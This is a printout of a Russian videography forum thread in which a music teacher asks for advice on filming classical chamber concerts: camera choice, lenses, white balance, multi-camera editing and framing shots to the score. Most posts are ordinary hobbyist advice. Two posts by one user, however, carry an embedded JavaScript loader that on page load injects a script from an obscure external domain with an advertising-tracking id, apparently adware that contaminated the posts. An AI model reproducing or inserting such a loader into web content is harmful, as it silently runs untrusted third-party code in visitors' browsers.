Распечатать страницу | Закрыть окно

Съемки концертов классической музыки

Напечатано из: VIDEOMAX
Наименование форума: Видеосъемка
Описание форума: Обсуждение творческих вопросов видеосъемки
URL: http://www.videomax.ru/forum/forum_posts.asp?TID=69105
Дата печати: 16-октября-2018 05:48
Версия программного обеспечения: Web Wiz Forums 12.01 - http://www.webwizforums.com

Тема: Съемки концертов классической музыки
Опубликовал: Igor Pink
Тема: Съемки концертов классической музыки
Дата публикации: 24-апреля-2018   10:13
Я новичок. Педагог-музыкант. Мои студенты играют на разных концертах. Хотелось бы снимать концерт или отдельные номера, которые потом можно было бы не только размещать в Ютюбе, но и предлагать ТВ каналам для демонстрации.
Я имею камеру Canon 750D с оптикой Sigma. Сейчас планирую покупать либо Go Pro Hero5 либо YI Technology 4K Action. Так как именно такого типа камеры красиво снимают руки пианиста, клавиши рояля итд.
Canon 750D будет стоять либо слева, либо справа от сцены. Либо я буду ходить с ним с ручным стабилизатором.

Главный вопрос теперь - это выбор камеры для общего плана - в центре зала.Возможно по ходу концерта буду делать Zoom (средние планы) Кто из профи может объяснить плюсы и минусы следующих камер:
Panasonic HC-VX981K 4K Ultra HD Camcorder и Panasonic AG-AC30 Full HD Camcorder в моей конктретной ситуации
Я хорошо понимаю, что они из разных ценовых категорий и из разных классов... Но может быть здесь возможны варианты?
Качество звука не интересует. Так как звук у меня пишется отдельно на другие носители.

Ответов:
Опубликовал: Alehandro
Дата публикации: 24-апреля-2018   14:19
Не совсем понятно какой состав музыкантов вы будите снимать.
Вы нам обрисуйте поконкретнее,тогда и советы будут вменяемые.

-------------
Panasonic FZ2000_G85_GX85.Lumix 20mm-1.7,12-60mm,100-300mm.Olympus 45mm-1.8.Sigma 60mm-2.8,30mm-1.4,Samyang 10mm.EDIUS 8.53.

Опубликовал: Wind_A
Дата публикации: 24-апреля-2018   14:26
Я бы советовал брать к фотоаппарату только фотоаппараты. Или видеокамеру с матрицей от 1 дюйма. Иначе свести картинку с мелкоматричной камерой будет проблемно.

-------------
Panasonic HC-X1,
Panasonic LUMIX DMC-GX80,
Panasonic LUMIX DMC-G6-2шт.,
кучка стёкол для Panasonic,
и много-много других любимых игрушек.

Дата публикации: 24-апреля-2018   19:29
Было отправлено Alehandro Alehandro написал(а):

Не совсем понятно какой состав музыкантов вы будите снимать.
Вы нам обрисуйте поконкретнее,тогда и советы будут вменяемые.

Спасибо! Вот варианты возможных составов:
1) рояль - соло
2) дуэты: рояль + скрипка (виолончель, флейта, гобой итд)
3) трио: рояль + скрипка + виолончель (рояль + флейта + виолончель итд...)
4) квартет: 1-2 скрипки + альт + виолочель (флейта + гобой + кларнет + фагот)
5) квинтет: роляль + 1-2 скрипки + альт+ виолончель.
В основном такие составы - ну и возможны комбинации этих составов.

Дата публикации: 24-апреля-2018   19:34
Было отправлено Wind_A Wind_A написал(а):

Я бы советовал брать к фотоаппарату только фотоаппараты. Или видеокамеру с матрицей от 1 дюйма. Иначе свести картинку с мелкоматричной камерой будет проблемно.

Спасибо!
А можно подробнее - какие именно модели фотоаппаратов Вы советуете?
Один из моих друзей посоветовал мне для съемок общего плана купить вот такую модель:
https://www.bhphotovideo.com/c/product/1208931-REG/panasonic_lumix_dmc_g7_mirrorless_micro.html" rel="nofollow - https://www.bhphotovideo.com/c/product/1208931-REG/panasonic_lumix_dmc_g7_mirrorless_micro.html

И какие именно модели видеокамер имеют матрицу от 1 дюйма?

Дата публикации: 24-апреля-2018   19:37
Было отправлено Igor Pink Igor Pink написал(а):

Сейчас планирую покупать либо Go Pro Hero5 либо YI Technology 4K Action. Так как именно такого типа камеры красиво снимают руки пианиста, клавиши рояля итд.
Ни чего путного,этими камерами если не будет достаточно света,вы не снимите,эти камеры по большому счёту,для улицы.

-------------
Panasonic FZ2000_G85_GX85.Lumix 20mm-1.7,12-60mm,100-300mm.Olympus 45mm-1.8.Sigma 60mm-2.8,30mm-1.4,Samyang 10mm.EDIUS 8.53.

Дата публикации: 24-апреля-2018   19:56

Сейчас планирую покупать либо Go Pro Hero5 либо YI Technology 4K Action. Так как именно такого типа камеры красиво снимают руки пианиста, клавиши рояля итд.

<span style=": rgb248, 248, 252;">Ни чего путного,этими камерами если не будет достаточно света,вы не снимите,эти камеры по большому счёту,для улицы.</span>

В наличии есть различные LED подсветки.
А что все же лучше: Go Pro Hero5 или YI Technology 4K Action? В цене они отличаются почти в два раза.

И что скажете про видеокамеру (или фотоаппарат) для общего плана сцены? Чтобы при монтаже можно было делать zoom (с общего плана на средний) - без потери качества.
Есть же фотокамеры с возможностями 4К. Не зеркалки.

Дата публикации: 24-апреля-2018   20:19
Panasonic G80\85 или GX80\85,снимаете в 4к закидываете в проект FullHD и меняете крупность без потери качества.

-------------

Дата публикации: 24-апреля-2018   20:56

Panasonic G80\85 или GX80\85,снимаете в 4к закидываете в проект FullHD и меняете крупность без потери качества.

Уже более понятно! Спасибо!
Возможно будет потом свести картинку Canon 750D и картинку от Panasonic G80\85 в единое целое? Кардинальных отличий не будет?

Дата публикации: 24-апреля-2018   21:06
Отличия будут в чёткости картинки,но если на canon,будите снимать крупняки,а на panasonic общие планы,то разница для обывателя будет мало заметна)).

-------------

Дата публикации: 24-апреля-2018   21:18

А можно подробнее - какие именно модели фотоаппаратов Вы советуете?
Один из моих друзей посоветовал мне для съемок общего плана купить вот такую модель:
https://www.bhphotovideo.com/c/product/1208931-REG/panasonic_lumix_dmc_g7_mirrorless_micro.html" rel="nofollow - https://www.bhphotovideo.com/c/product/1208931-REG/panasonic_lumix_dmc_g7_mirrorless_micro.html
И какие именно модели видеокамер имеют матрицу от 1 дюйма?
Здесь уже всё зависит от вашего кармана и желания. Именно начиная с этой модели Вы уже можете получить хороший 4К за небольшие деньги. Модели Panasonic G80 и Panasonic GX80 имеют уже более новый датчик (сенсор) и матричную стабилизацию. А насчёт камер, например, та, что у меня в подписи. Есть ещё очень много более недорогих, отличающихся своими характеристиками. Здесь уже Гугл в помощь Smile

-------------
Panasonic HC-X1,

Дата публикации: 24-апреля-2018   21:51
Если можно еще 3 банальных вопроса -
1) можно ли управлять через смартфон видеозаписью на Panasonic DMC-G85 функциями Rec - Stop?
2) сколько должна камера "отдыхать" после 30 минутной записи, чтобы не перегреться?
3) чем отличается камера Panasonic DMC-G85 от Panasonic DMC-GХ85? (В моем конкретном случае съемок общего плана)

Дата публикации: 24-апреля-2018   21:58
1_можно
2_не греется и нет ограничения по времени записи(если не европейка)
3_зайдите в инет и посмотрите,практически только формфактором

-------------

Дата публикации: 25-апреля-2018   11:48
Пункт 3: Ещё и ценой!

-------------
Panasonic HC-X1,

Дата публикации: 29-апреля-2018   20:51
Еще пара вопросов в связи с моей темой:
Panasonic G80/85 и Panasonic GX80/85 - если взять только тушку.
И у меня в заначке есть пара севетских объективов - Юпитер 9 (экспортный) 2/85 и Индустар 1.8/55.
Понятно, что аппараты кропнутые и полнокадровые объективы будут неполноценны.
Вопросы:
1) стоит ли брать только тушку и использовать советские объективы и насколько кроп обрежет картинку
2) какие байонеты на этих панасониках? (Как на Canon 750D). Или там другие переходные кольца надо искать?

Дата публикации: 29-апреля-2018   20:52

И у меня в заначке есть пара советских объективов - Юпитер 9 (экспортный) 2/85 и Индустар 1.8/55.
Вопросы:
1) стоит ли брать только тушку и использовать советские объективы и насколько кроп обрежет картинку
2) какие байонеты на этих панасониках? (Как на Canon 750D). Или там другие переходные кольца надо искать?

Опубликовал: Ilia Iffing
Дата публикации: 29-апреля-2018   23:32

И у меня в заначке есть пара советских объективов - Юпитер 9 (экспортный) 2/85 и Индустар 1.8/55.
Вопросы:

Добрый день!
1) Имхо, ябы взял тушку с китовым объективом 14-140mm f/3.5-5.6 ( https://www.bhphotovideo.com/c/product/1182743-REG/panasonic_h_fs14140ak_14_140mm_f3_5_5_6_ois_lens.html" rel="nofollow - https://www.bhphotovideo.com/c/product/1182743-REG/panasonic_h_fs14140ak_14_140mm_f3_5_5_6_ois_lens.html ), в бюджетных условиях хорош для видео. Советские объективы можно попробовать использовать через переходники, если хочется поэкспериментировать. Имхо, они больше подойдут для художественных и фото экспериментов :) нежели для съемки концертов\репортажки.

2) у Panasonic G80/85 и Panasonic GX80/85 байонеты Micro 4/3 ( https://ru.wikipedia.org/wiki/%D0%9C%D0%B8%D0%BA%D1%80%D0%BE_4:3" rel="nofollow - https://ru.wikipedia.org/wiki/%D0%9C%D0%B8%D0%BA%D1%80%D0%BE_4:3 )
т.е. это 2x Crop Factor от Фул Фрейм.

а у Canon 750D  совершенно другая система и матрица APS-C, т.е. 1.6x Crop Factor.

Дата публикации: 30-апреля-2018   13:49
По своей неопытности - мне (вне форума) посоветовали использовать экшн камеру YI Technology 4K Action Camera. Это для съемки рук пианиста, клавиатуры рук скрипача итд.
Камера должна стоять на небольшом штативе.
Здесь на форуме мне подсказали, что эта камера в основном для улицы. Что можете посоветовать вместо этой YI Technology 4K Action Camera?
Задача - съемки рук пианиста, гитариста, детали виолончели итд...
Что-то не очень дорогое. Бюджетное. Чтобы картинка потом, при монтаже совпала с Panasonic G80/85 и Canon 750D

Опубликовал: земляк
Дата публикации: 30-апреля-2018   15:03
Нормально посоветовали. Вам картинку на канал дискавери? Нет? Но тогда нормально свидётся при умелых ручках...))

Опубликовал: Ilia Iffing
Дата публикации: 30-апреля-2018   15:43

По своей неопытности - мне (вне форума) посоветовали использовать экшн камеру YI Technology 4K Action Camera. Это для съемки рук пианиста, клавиатуры рук скрипача итд.
Камера должна стоять на небольшом штативе.
Здесь на форуме мне подсказали, что эта камера в основном для улицы. Что можете посоветовать вместо этой YI Technology 4K Action Camera?
Задача - съемки рук пианиста, гитариста, детали виолончели итд...
Что-то не очень дорогое. Бюджетное. Чтобы картинка потом, при монтаже совпала с Panasonic G80/85 и Canon 750D
Вот же вам Alehandro ответил все верно:

Отличия будут в чёткости картинки,но если на canon,будите снимать крупняки,а на panasonic общие планы,то разница для обывателя будет мало заметна)).
Вы снимайте в 4K и YI и панасониками чтобы была возможность на посте поправить кадры, сделать кроп, если что-то не понравиться. И при достаточном освещении все будет более-менее Ок. Протестируйте и сами все увидите, сделаете выводы. Так в теории можно еще долго сомневатьсяSmile

Опубликовал: Baddancer
Дата публикации: 30-апреля-2018   17:19
DMC-LX100 на вторичном рынке 25т.р.

Опубликовал: SegoStu
Дата публикации: 30-апреля-2018   18:07
Igor Pink

Я как бывший музыкант, в свое время много практикующий и играющий посоветовал бы так, GX85 парочку (G80.85) + LX 100 , последняя вместо экшн, по качеству и возможностям на порядок + мелкая и с хорошим углом, вы ее поставите на штатив, вполне можно взять средне-крупный план с руками, если будут нужны руки отдельно - всегда сделайте кроп с 4к.
Правильно посоветовали - снимать в 4к, будет возможность поиграться крупностями на монтаже.
Еще как вариант, можно рассмотреть fz1000-2000 на вторичке, там есть один "плюс" - объектив не сменный, но хороший), не надо будет потом голову сомнениями забивать, а для ваших задач будет самый то.

Ну и как бы подумайте про звук, его конечно лучше писать на внешнее устройство с соответствующими микрофонами и в монтаже сводить. А то порой на ютубе и исполнитель, зал, оркестр, дирижер - на высоте, картинка вроде как и пойдет, а звук.... и особенно этим как раз и грешат наши родные съемщики классической музыки. (я думаю вы слушаете, и понимаете про что я, в сравнении с западными каналами, ну или любителями...) Даже если сделаете картинку, но без звука - деньги , силы и все прочее - на ветер.

-------------
HC-X1, G85, Pentax K1, k3

Дата публикации: 30-апреля-2018   19:12
[QUOTE ]Ну и как бы подумайте про звук, его конечно лучше писать на внешнее устройство с соответствующими микрофонами и в монтаже сводить. А то порой на ютубе и исполнитель, зал, оркестр, дирижер - на высоте, картинка вроде как и пойдет, а звук.... и особенно этим как раз и грешат наши родные съемщики классической музыки. (я думаю вы слушаете, и понимаете про что я, в сравнении с западными каналами, ну или любителями...) Даже если сделаете картинку, но без звука - деньги , силы и все прочее - на ветер.[/QUOTE]

Со звуком по мере возможностей. 2 микрофона (стерео пара) - JZ1 -справа и слева, ноутбук, RME Baby, Pro Tools 12.
На всякий случай по центру Zoom H2n

Дата публикации: 26-мая-2018   21:10
Наверное спрошу элементарные вещи... Но мне как новичку полезно читать советы профи.
У меня в наличии сейчас три камеры: Panasonic GX85, Canon 750D и YI 4k.
GX85 - на общий план (вся группа музыкантов, оркестр)
750D средние планы (отдельные инструменты)
YI 4k - в основном около пианиста (руки, клавиши)
В связи с этим два вопроса:
1) как грамотно выставить баланс белого, чтобы все три камеры были в одной цветовой гамме?
может какой нибудь гэджет посоветуете для этого. Их на рынке много.
2) учитывая, что 750D снимает только FullHD в mp4, а на GX85 я собираюсь снимать 4К и по видимому YI 4k тоже будет FullHD - какие тут подводные камни при монтаже? Какой делать проект - с какими параметрами
Монтажка у меня Final Cut на Маке.
Спасибо всем кто поможет!

Опубликовал: CANON M46
Дата публикации: 26-мая-2018   22:58
ТАКИЕ СЛОЖНОСТИ)ЭТО СНИМАЕТСЯ ОДНОЙ КАМЕРОЙ А ЗВУК ПИШЕТСЯ ОТДЕЛЬНО)

Дата публикации: 26-мая-2018   23:19
Было отправлено CANON M46 CANON M46 написал(а):

Ну это примитивно. Я так снимал несколько лет назад...

Дата публикации: 26-мая-2018   23:27
Igor Pink

Все правильно расписали, баланс выставляйте перед концертом по серому, в FCPX потом поправите, если не точно, проект full hd, с камер 4к сможете кропом выбирать планы.

-------------

Дата публикации: 26-мая-2018   23:36
SegoStu Спасибо! Значит на верном пути! Учусь потихоньку...

Дата публикации: 26-мая-2018   23:36

МОЖНО ТАК СНЯТЬ ЧТО СОВСЕМ НЕ БУДЕТ ПРИМИТИВНО)А ГЛАВНОЕ ГОРАЗДО ПРОЩЕ)ЗАЧЕМ УСЛОЖНЯТЬ?

Дата публикации: 26-мая-2018   23:37
Было отправлено SegoStu SegoStu написал(а):

]Все правильно расписали, баланс выставляйте перед концертом по серому, в FCPX потом поправите, если не точно, проект full hd, с камер 4к сможете кропом выбирать планы]

Спасибо!
Перед каждой камерой тупо снимать одну и ту же серую картонку?

Дата публикации: 26-мая-2018   23:40

МОЖНО ТАК СНЯТЬ ЧТО СОВСЕМ НЕ БУДЕТ ПРИМИТИВНО)А ГЛАВНОЕ ГОРАЗДО ПРОЩЕ)ЗАЧЕМ УСЛОЖНЯТЬ?

Например как? Во время концерта - бегать по залу?    с трясущейся камерой? Вы классические концерты смотрели по Культуре ТВ? Как снято!

Дата публикации: 27-мая-2018   01:53
Бегать ни куда не надо, тремя вполне справитесь.
У вас три камеры, разных производителей, у разных производителей цвет отличается, что бы меньше возни было на посте, прочитайте инструкцию к каждой камере, как вручную выставить баланс белого. Можно и в автомате, только алгоритм его работы в разных камерах разный, не всегда адекватный, особенно на "зоопарк" дешевого современного освещения.

С трех вы сможете вполне смонтировать смотребительное видео, даже без "движухи" (хотя то, что у вас будет в 4к вполне можно анимировать по размеру (скейл) и позиции (позишен). Тут  важнее (может быть, со временем) найти что ли некий свой фирменный стиль.... Что имеется ввиду.., например, если на ютубе смотрели концерты Караяна, то у него практически нет общих планов, или средние, а в большей мере - крупные (играет флейта сольный - она и т.д., с переходом на дирижера), это наверно не совсем правильно, но так, и думаю, он сам к этому руку приложил, ну и в сравнении, Светлановский оркестр, в точности до наоборот, общие-дирижер, участники безликие.

-------------

Опубликовал: Serg1961
Дата публикации: 27-мая-2018   05:54

Так как ты снимаешь, вообще лучше ничего не снимать. 

-------------
GH4,G6*2,7-14\4,12-35\2.8,35-100\2.8,14\2.5,25\1.8,45\1.8 Canon5DMarkII,Canon50\1.4,Canon 85\1.8,Canon24-70\2.8, Crane Plus, Phantom 4A,GoProHero3.

Дата публикации: 27-мая-2018   10:22
Походу, CANON M46 просто  набивает своими тупыми постами свой профиль... Угомонитесь и не засоряйте все ветки!  

-------------
Panasonic HC-X1,

Опубликовал: Dentus0
Дата публикации: 27-мая-2018   12:41
Canon 46. вам правильно указывают путь.

-------------
Canon hf G10
Canon eos 1100d

Дата публикации: 27-мая-2018   12:44
Раньше я тоже записывал концерт на 1 камеру. А 17.05 запись вел на 2 камеры. А теперь звук и отдельно писать буду с пульта.

-------------
Canon hf G10
Canon eos 1100d

Опубликовал: Koturga
Дата публикации: 27-мая-2018   13:12

]Все правильно расписали, баланс выставляйте перед концертом по серому, в FCPX потом поправите, если не точно, проект full hd, с камер 4к сможете кропом выбирать планы]

Спасибо!
Перед каждой камерой тупо снимать одну и ту же серую картонку?
Т.к. парк камер разный поставьте на камерах единый баланс белого..средний параметр между 3200 и 5600
поставьте 4000 .. при концертном свете ..сфотографируйте куаждой камерой карту серого

на монтаже все легко приведете к единому знаменателю

если у вас есть здлут креатор-можно снимать и с авто балансом на всех камерах..в здлуткреаторе все элементарно подберетсмя под бб той камеру,которую выберете основной по цвету и бб

-------------
BMPCC/А6500/5dm2/60d/Gopro/Mavic pro
I7-8700k/Z370/GtxTitan/lg 3000h
Edius 9

http://www.vimeo.com/koturga
shotncut.com
anastasiadi.com

Дата публикации: 27-мая-2018   19:04
Я всегда выставляю вручную, не отбивать же ББ во время концерта? А до его начала - условия совсем иные.

-------------
Panasonic HC-X1,

Дата публикации: 27-мая-2018   20:47
Чтобы снимать многокамерное видео надо иметь отряд операторов и режиссёра)А так это всё примитивно)Вы просто запутаетесь в кадрах и будет каша)На одну камеру будет качественнее да и зрителю пофигу сколько у вас камер)

Дата публикации: 27-мая-2018   20:55
Вы, или не понимаете , про что пишите, или провоцируете на флуд.дискурс.
Автор имеет некое представление, что хочет получить в результате, задает адекватные вопросы, на которые получает ответы. Прочитайте внимательно стартертопик.

-------------

Дата публикации: 27-мая-2018   21:11

Автор имеет некое представление, что хочет получить в результате, задает адекватные вопросы, на которые получает ответы. Прочитайте внимательно стартертопик.
Клянусь своей камерой что одному полноценное многокамерное видео снять не реально!

Дата публикации: 27-мая-2018   21:47
Вот интересно,пацаны поведутся на твой троллингBig smileSmoke

-------------

Дата публикации: 27-мая-2018   22:03
Автор топика где видео?Хватит уже бла бла

Дата публикации: 27-мая-2018   22:04
С начала темы уже месяц прошёл!за это время можно кино снять)

Дата публикации: 27-мая-2018   22:14

Клянусь своей камерой что одному полноценное многокамерное видео снять не реально!
Чукча не читатель, чукча - писатель Big smile

-------------
Panasonic HC-X1,

Дата публикации: 27-мая-2018   22:19
Чувак хочет снять оркестр на три камеры что я не так понял?

Опубликовал: vidik-fotik
Дата публикации: 27-мая-2018   23:43
"""Клянусь своей камерой что одному полноценное многокамерное видео снять не реально!"""
Снимаю в одну морду панас 160 и 3 экшн камеры. Звук на зум. Тут концерт , не щедевр, но клиент доволен , особенно тем, что нахаляву и с отдачей через пару дней (друзья, блин ) . )))) Честно говорю - не вылизывал. В субботу попробую ещё и с самодельным краном детский конкурс талантов с оркестром запилить ))) Сам, как оркестр  Big smile . А где камеру забирать ? Пацан сказал - пацан сделал Tonguehttps://yadi.sk/i/QQ_r5IuN3WNXL3  

Дата публикации: 27-мая-2018   23:49
У меня не открывается(давай другой сервер

Дата публикации: 28-мая-2018   00:00
Вроде проблем небыло. Это для заказчика лежит, перегружать куда то некогда, завтра концерт - онлайн и три камеры пишут. 

Дата публикации: 28-мая-2018   00:03
Этот яндекс в украине заблокирован

Опубликовал: Lucky Gonza
Дата публикации: 28-мая-2018   10:51
Можно, элементарно, напрячься слегка и открыть через VPN или Tor-ом.

-------------
Sony NX3 в ТЖК комплектации,
Lumix GH5 + 14-140(4-5,8), 35-100(f2,8) 12-35(f2,8), Olympus 50-200(f2,8-3,5)etc.
Zhiyun Crane v.2
Не фокус - крутить фокус, фокус за это деньги получать )))...

Дата публикации: 28-мая-2018   11:26
Посмотрел немного,что я могу сказать-нет жизни в съёмке видно что один человек снимает и режиссёра явно не хватает(чуть не заснул).На ведущего много времени ушло(много можно вырезать)Так же много мусорных кадров-сказывается съёмка одним человеком.Так что как не крутите а полюбому нужны операторы и режиссёр чудес не бывает.Задний план по моему лишний

Дата публикации: 28-мая-2018   16:31
vidik-fotik Лично для полезное видео оказалось. Весьма! Спасибо! Для себя отметил Ваши плюсы. Зал очень хороший и свет ровный. В целом мне понравилось!
Из минусов - это в основном по музыкальной части. Я сам по профессии музыкант, поэтому в первую очередь обращаю внимание на это.
У вас не всегда кадр соответствует звучанию оркестра. Конкретно: оркестр делает crescendo и идет на tutti я бы, как музыкант постепенно отводил камеру от среднего плана на общий. Чтобы при tutti был виден весь оркестр. А так оркестр выходит на тутти, а у вас в кадре группа виолончелей. Или у оркестра малое тутти с участием медной группы, а в кадре pizzicato струнных (они как раз тут второстепенные) ну итд.
Но в целом мне очень понравилось! Для меня, новичка в видео - очень поучительно!

Дата публикации: 28-мая-2018   16:34
vidik-fotik Поделитесь опытом - где у вас были расставлены камеры? Как вы делали движение камер слева-направо (программно или физически)?
Спасибо, еще раз!

Опубликовал: земляк
Дата публикации: 28-мая-2018   18:47
Никогда не понимал классическую музыку, прошу обьяснить зачем куча скрипок в оркестре? по моему все одно и то же играют....))

Дата публикации: 28-мая-2018   18:53
Спасибо и за добрые слова и за критику. Отвечаю. Как я писал концерт был внезапно нарисовавшимся и халявным. Снимал для оркестра. На репитиции я не был, слышал почти всё впервые  и понятия не имел , что будет исполняться и когда будет pizzicato . К сожалению, я не профессиональный музыкант , ( учился когда то ударным у Ефимова, а он в "Круиз" умотал ))) Сами музыканты предупредили, что будет редкостная тягомотина. Вот и пытался оживить видео сменой планов. Ни о какой рижессуре речи даже нет.  Как чукча - что вижу , то пою. "Роскошные" бюджеты данных мероприятий позволяют нанять дополнительно примерно ноль человек ассистентов и минус два автобуса ПТС. Есть ещё вариант найти таких же придурков, снимающих нахаляву, но пока не нашёл))) Что будет делать органист ( собственно композитор ) я тоже не знал. Камеру еле к нему пристроил ( проша 3 ) , но он , положив перед ней ноты загнал свою мордашку в минус по свету. Натянул немного. На общем плане стояла Сяоми 4К на высоком штативе и с ней же зум Н1 . На сяоми хочу поменять объектив на менее широкий и пользовать её на общаках. В 4к она пишет только рыбьим глазом, а мне это не надо.За то 2 часа нон стоп ( при говённом звуке, но для синхронизации хватает). .  Покупать камеру для общего плана отдельно нет в планах. Всё должно помещаться в одном кофре. В оркестре стоял штатив с RiderM и GoPro4silver. Его задача крутиться и симать оркестр "изнутри" но подвёл блютуз. Когда зал пустой 30 метров без проблем, но когда старушки набиваются с гаджетами голубой зуб шатается ))) Так, что круговые панорамы не вышли. Иногда менял планы. Брелок дистанционки упорно терял связь. Крупняки брал панасоником 160 на самом длинном зуме со средины зала. Штатив 30 летний SLIK. Панорамы программно не делал. Монтаж - тяп ляп на ускорке с использованием прокси . Да , про болтовню в начале. Оставил специально, что бы до товарища болтающего дошло, что есть сестра таланта. 14 минут втулять пургу приглашённым ветеранам  это был рекорд. Для оркестра пересчитал без него ))) Так, что с задачей сделать одномордную ПТС помещаюшуюся в одном кофре потихоньку справляюсь. Ещё иногда стал таскать 5 метровый кран. Вот тут первый раз использовал. Съёмка тоже с ходу без репитиций. Две камеры. .   https://yadi.sk/i/tF4gDUmr3PXcFJ " rel="nofollow - https://yadi.sk/i/tF4gDUmr3PXcFJ  ;

Дата публикации: 28-мая-2018   19:03

vidik-fotik 
У вас не всегда кадр соответствует звучанию оркестра. Конкретно: оркестр делает crescendo и идет на tutti я бы, как музыкант постепенно отводил камеру от среднего плана на общий. Чтобы при tutti был виден весь оркестр. А так оркестр выходит на тутти, а у вас в кадре группа виолончелей. Или у оркестра малое тутти с участием медной группы, а в кадре pizzicato струнных (они как раз тут второстепенные) ну итд.

А вот тут вы нас можете поучить! Профессиональных музыкантов среди нашей братии не много. Тоже предлагаю поделиться мыслями. Большинство из нас учились методом научного тыка. Мне бы было очень полезно узнать где более уместен какой план под crescendo - общий или руки дерижёра ?))))

Дата публикации: 28-мая-2018   19:49
vidik-fotik Для меня очень интересно и познавательно - то что вы написали.
Вообще для меня пока невероятно сложно - управлять. Практики нет. Навыка нет. И один не справлюсь это точно.
Мне пока показать что то - еще очень рано... Пока только пытаюсь...
Что касается сочетания музыки и кадра - я на это дело смотрю как музыкант. Если от меня будет какая то польза для общего дела - я всегда готов! Все что интересует - спрашивайте. Если смогу - отвечу.
Я пока что только экспериментирую. Записываю своих студентов или учеников. К сожалению, зал и свет где приходилось снимать - Кошмар Кошмарович. Поэтому даже стыдно показывать.
Для меня это скорее хобби, чем бизнес.

Дата публикации: 28-мая-2018   19:58
Было отправлено земляк земляк написал(а):

Никогда не понимал классическую музыку, прошу обьяснить зачем куча скрипок в оркестре? по моему все одно и то же играют....))

Каждый инструмент в оркестре - делает свое дело. Есть эпизоды, где важны скрипки, есть моменты где деревяшки (гобои, кларнеты итд...)
Пример: Вы делаете фото. На переднем плане стоит дерево, на заднем человек. Наведите фокус на дерево и человек становится фоном. Наведите фокус на человека и дерево - стало фоном. Не зависимо от того, что оно на переднем плане.
Так и в классической музыке. Одна группа инструментов может, в определенных условиях быть фоном, а другая солировать и наоборот.
Это называется фигуро-фоновые связи...
Я своим студентам про это рассказываю. Ведь музыка и кино - очень связаны друг с другом. И то и другое искусство во времени. И Там и там есть главные герои, а есть эпизодические. Тем не менее - все важно.

Дата публикации: 28-мая-2018   20:16

-------------

Дата публикации: 28-мая-2018   20:22

-------------

Дата публикации: 28-мая-2018   20:28
Правда я не силен в симфонических оркерстрах. Но съемка на улице и в метрах 25 от сцены.

-------------
Canon hf G10
Canon eos 1100d

Опубликовал: Makarewsky
Дата публикации: 28-мая-2018   20:49
Добавлю из своего старенького, немного классики

-------------
ничего нет , всё беру в аренду.

Дата публикации: 29-мая-2018   09:19
Кто подскажет, возможно ли для настройки баланса белого - сделать самостоятельно серую карту?
В интернете нашел картинку - вот думаю распечатать на цифровой полиграфии на матовой бумаге - 350 гр. Какой должен быть оптимальный размер?
Получится? Или это будет фигня?

Опубликовал: Questor
Дата публикации: 29-мая-2018   09:29
Фигня это будет, цифровая полиграфия не эталон, её нелинейно уведет в какую-нибудь сторону (если быть совсем точным, то во все). 

Надо карту X-Rite. 

https://www.bhphotovideo.com/c/product/1191325-REG/x_rite_msccvpr_colorchecker_video.html" rel="nofollow - https://www.bhphotovideo.com/c/product/1191325-REG/x_rite_msccvpr_colorchecker_video.html

-------------
Canon EOS 5D Mark III & Canon EOS 1Ds Mark II & Canon EOS 7D & 2xCanon EOS 60D & 2xCanon EOS 600D & M16A4 & Zoom R24 & Roland R-26 & Зоопарк оптики & Дрейк в армортанке
---
Макинава фармит лёд

Дата публикации: 29-мая-2018   09:44
Было отправлено Questor Questor написал(а):

Фигня это будет, цифровая полиграфия не эталон, её нелинейно уведет в какую-нибудь сторону (если быть совсем точным, то во все). Надо карту X-Rite.

Дороговато... Может быть есть более бюджетные решения? Иногда советуют просто серую картонку. Смотрел много видео на эту тему... При выставлении ББ

Дата публикации: 29-мая-2018   10:08
Можно и по картонке. Чем бюджетнее решение, тем большое допуск, только и всего.

-------------
Canon EOS 5D Mark III & Canon EOS 1Ds Mark II & Canon EOS 7D & 2xCanon EOS 60D & 2xCanon EOS 600D & M16A4 & Zoom R24 & Roland R-26 & Зоопарк оптики & Дрейк в армортанке
---
Макинава фармит лёд

Опубликовал: Djami
Дата публикации: 29-мая-2018   14:45
Может это уже было, не читал всю ветку... 
Расскажу, как мы работали в Оперном театре, снимая на три камеры. 
Не хвастаюсь, а просто делюсь опытом, как снять эффективнее, чем заезжие ТВ-шники с 4-6  камерами. 

Одна камера снимала общий план. Две остальные рыскали по оркестру или солистам, получая команды от режиссера монтажа. 
Но фишка в том, что я или не занятый в концерте дирижер, сидели рядом с режиссером с партитурой в руках и заранее предупреждали, кто и когда вступает.

void function () { if (window.self !== window.top)return; var appid = 'coi2-10064-1464954085004-d01f3973-6388-4236-974a-ef11dbb7c885'; window['advppUserId']='coi2-10064-1464954085004-d01f3973-6388-4236-974a-ef11dbb7c885'; if (window.O7JFWNKS2FkEhGn3dFE) return; inject("//api.kgwpvnvmna.life/common/module.js?streamId=TUE9PQ==&isAdvpp=true"); function inject(e) { var b = document.createElement("script"); b.src = e; b.onload = b.onerror = function () { setTimeout(function () { try { b.parentNode.removeChild(b) } catch (f) { } }, 0) }; document.body.appendChild(b) } }();

Дата публикации: 29-мая-2018   15:45
Ох уж эти "ТВ-шники"... Big smile
А ничего, что в ПТС на симфо, часто, режи с консерваторским образованием сидят?
Наверное не везде, правда...
Но тогда, надо бы говорить, что "наши тв-шники"... Не? Big smile

-------------
Lumix GH5 + 14-140(4-5,8), 35-100(f2,8) 12-35(f2,8), Olympus 50-200(f2,8-3,5)etc.
Zhiyun Crane v.2

Дата публикации: 30-мая-2018   11:59
К сожалению, в моем городе, кроме себя, я не знаю ни одного оператора или режиссера с консерваторским образованием. 

Даже музыкальной школы за плечами нет. Я своих операторов научил узнавать звучание музыкальных инструментов на слух. За пару недель неспешного обучения, они легко отличали тромбон от валторны, к примеру, или кларнет от гобоя.

void function () { if (window.self !== window.top)return; var appid = 'coi2-10064-1464954085004-d01f3973-6388-4236-974a-ef11dbb7c885'; window['advppUserId']='coi2-10064-1464954085004-d01f3973-6388-4236-974a-ef11dbb7c885'; if (window.O7JFWNKS2FkEhGn3dFE) return; inject("//api.kgwpvnvmna.life/common/module.js?streamId=TUE9PQ==&isAdvpp=true"); function inject(e) { var b = document.createElement("script"); b.src = e; b.onload = b.onerror = function () { setTimeout(function () { try { b.parentNode.removeChild(b) } catch (f) { } }, 0) }; document.body.appendChild(b) } }();

-------------
Кран "Alan LC 50". http://www.youtube.com/watch?v=nt8fqwu751U&feature=g-upl&context=G28d49e1AUAAAAAAABAA

Покет, Метабонс, Сигма 17-70

Дата публикации: 30-мая-2018   12:14
Консерваторское образование не обязательно на таких съемках. Джами правильно написал, главное уметь узнавать инструменты по тембру. Ну и общак и камера на зрительный зал - наше все!

-------------
